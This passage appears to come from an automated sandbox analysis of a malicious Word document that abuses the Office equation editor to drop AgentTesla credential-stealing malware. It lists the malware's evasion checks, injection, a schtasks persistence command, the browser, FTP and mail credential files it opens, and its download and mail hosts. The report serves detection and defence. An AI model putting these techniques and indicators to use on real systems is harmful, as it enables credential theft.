                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM3Show sources
                  Source: Yara matchFile source: 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00405174 sldt word ptr [eax]
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWindow / User API: threadDelayed 9416
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468Thread sleep time: -103327s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468Thread sleep time: -40000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2744Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2800Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2420Thread sleep time: -360000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476Thread sleep time: -120000s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2936Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeThread delayed: delay time: 103327
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeThread delayed: delay time: 40000
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeThread delayed: delay time: 30000
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2096028933.000000000020B000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: VMWARE
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0040418A LdrInitializeThunk,
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMemory written: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe base: 400000 value starts with: 4D5A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmpBinary or memory string: !Progman
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeQueries volume information: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeQueries volume information: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
                  Source: Yara matchFile source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: Yara matchFile source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
                  Source: Yara matchFile source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSSecurity Software Discovery211Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion141Cached Domain CredentialsVirtualization/Sandbox Evasion141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 385437 Sample: RFQ ..doc Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 Sigma detected: Scheduled temp file as task from temp location 2->50 52 9 other signatures 2->52 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 336 20 2->12         started        14 EQNEDT32.EXE 2->14         started        process3 dnsIp4 36 rotronics.com.ph 203.167.7.88, 49167, 80 IWEB-ASCA Philippines 7->36 30 C:\...\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, PE32 7->30 dropped 32 C:\Users\user\...\ZhIOjFmINIXbKXm[1].exe, PE32 7->32 dropped 60 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->60 16 rghbyjuyktyjrthbgvfsfhytrrgfsd.exe 1 8 7->16         started        file5 signatures6 process7 file8 26 C:\Users\user\AppData\...\cAFIUeWyVQPJe.exe, PE32 16->26 dropped 28 C:\Users\user\AppData\Local\...\tmpBFD6.tmp, XML 16->28 dropped 38 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->38 40 Machine Learning detection for dropped file 16->40 42 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->42 44 2 other signatures 16->44 20 rghbyjuyktyjrthbgvfsfhytrrgfsd.exe 4 16->20         started        24 schtasks.exe 16->24         started        signatures9 process10 dnsIp11 34 mail.privateemail.com 198.54.122.60, 49168, 49169, 49171 NAMECHEAP-NETUS United States 20->34 54 Tries to steal Mail credentials (via file access) 20->54 56 Tries to harvest and steal ftp login credentials 20->56 58 Tries to harvest and steal browser information (history, passwords, etc) 20->58 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe100%Joe Sandbox ML

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack100%AviraHEUR/AGEN.1138205Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  rotronics.com.ph0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
